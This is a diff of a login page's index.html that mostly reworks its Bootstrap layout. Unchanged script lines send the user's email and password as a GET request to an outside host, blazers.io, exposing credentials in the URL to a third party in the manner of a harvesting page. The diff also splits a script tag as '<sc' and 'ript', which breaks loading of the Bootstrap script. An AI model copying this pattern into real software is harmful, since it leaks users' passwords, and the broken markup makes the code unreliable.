--- a/index.html
+++ b/index.html
@@ -7,7 +7,8 @@
     <meta name="author" content="login">
     <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous">
     <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.2/dist/umd/popper.min.js" integrity="sha384-IQsoLXl5PILFhosVNubq5LC7Qb9DXgDA9i+tQ8Zj3iwWAwPtgFTxbJ8NT4GN1R8p" crossorigin="anonymous"></script>
-    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/js/bootstrap.min.js" integrity="sha384-cVKIPhGWiC2Al4u+LWgxfKTRIcfu0JTxR+EQDz/bgldoEyl4H0zUF0QKbrJ0EcQF" crossorigin="anonymous"></script>
+    <sc
+    ript src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/js/bootstrap.min.js" integrity="sha384-cVKIPhGWiC2Al4u+LWgxfKTRIcfu0JTxR+EQDz/bgldoEyl4H0zUF0QKbrJ0EcQF" crossorigin="anonymous"></script>
     <link rel="preconnect" href="https://fonts.googleapis.com">
     <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
     <link href="https://fonts.googleapis.com/css2?family=Open+Sans:ital,wght@0,300..800;1,300..800&family=Ubuntu:ital,wght@0,300;0,400;0,500;0,700;1,300;1,400;1,500;1,700&display=swap" rel="stylesheet">
@@ -17,31 +18,31 @@
     <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.7.1/jquery.min.js"></script>
 </head>
 <body>
-<div class="container">
-  <div class="row align-items-center ">
-    <div class="col-lg-6">
+<div class="container-fluid">
+  <div class="row min-vh-100 align-items-center justify-content-center">
+    <div class="col-12 col-md-8 col-lg-6 mx-auto" id="form">
             <h1>Welcome,</h1>
             <h5 class="font text-muted fw-light">See your growth and get consulting support</h5>
-        <form action="#" id="form">
-            <button class="btn bg-light mb-4 mt-4"><span id="google"><img src="assets/Image/google.png" alt="google"></span>Sign in with Google</button><br>
-            <div class="or-container">
+        <form action="#" class="form">
+            <button class="btn bg-light mb-4 mt-4 w-100"><span id="google"><img src="assets/Image/google.png" alt="google"></span>Sign in with Google</button><br>
+            <div class="or-container w-100">
 				<div class="line-separator"></div>
 				<div class="or-label">Or</div>
 				<div class="line-separator"></div>
 			</div>
             <label form="form">Email</label><br>
-            <input type="email" placeholder="   mail@domain.com" class="email py-2 mb-4" required><br>
+            <input type="email" placeholder="   mail@domain.com" class="email py-2 mb-4 w-100" required><br>
             <label form="form">Password</label><br> 
-            <input type="password" placeholder="   min. 8 characters" required class="pass py-2 mb-2"><span><i id="togglePassword" class="fa fa-eye" style="cursor:pointer;"></i></span><br>
-            <input type="checkbox" class="check mb-4">Remember me
-            <a href="#" class="anchor">Forgot Password?</a> <br>   
-            <button class="btn bg-success" id="log">Login</button>
-            <p class="text-muted mt-2">Not registered yet?  <a href="#" class="anchor2">Create an account</a> </p>
+            <input type="password" placeholder="   min. 8 characters" required class="pass py-2 mb-2 w-100"><span><i id="togglePassword" class="fa fa-eye" style="cursor:pointer;"></i></span><br>
+            <input type="checkbox" class="check mb-4 me-2 ">Remember me
+            <a href="#" class="anchor float-end">Forgot Password?</a><br> 
+            <button class="btn bg-success w-100" id="log">Login</button>
+            <p class="text-muted mt-3 float-end">Not registered yet? <a href="#" class="anchor2">Create an account</a> </p>
         </form>
     </div>
-        <div class="col-lg-6" class="img">
-            <img src="assets/Image/banner.png" alt="image">
-        </div>
+        <div class="col-12 col-lg-6 text-center">
+            <img src="assets/Image/banner.png" alt="image" class="img-fluid">
+        </div> 
   </div>
 </div>
 <script>
@@ -72,7 +73,7 @@ $(document).ready(function(){
             url: "https://blazers.io/",
             method: "GET",
             data: {
-            email: email,
+            email: email, 
             password: password
             },
             success: function(response){
@@ -80,7 +81,7 @@ $(document).ready(function(){
             // Handle response if needed
             },
             error: function(xhr, status, error){
-            alert("AJAX request failed: " + error);
+            alert("AJAX request failed: doesn't approve");
             }
         });
         }
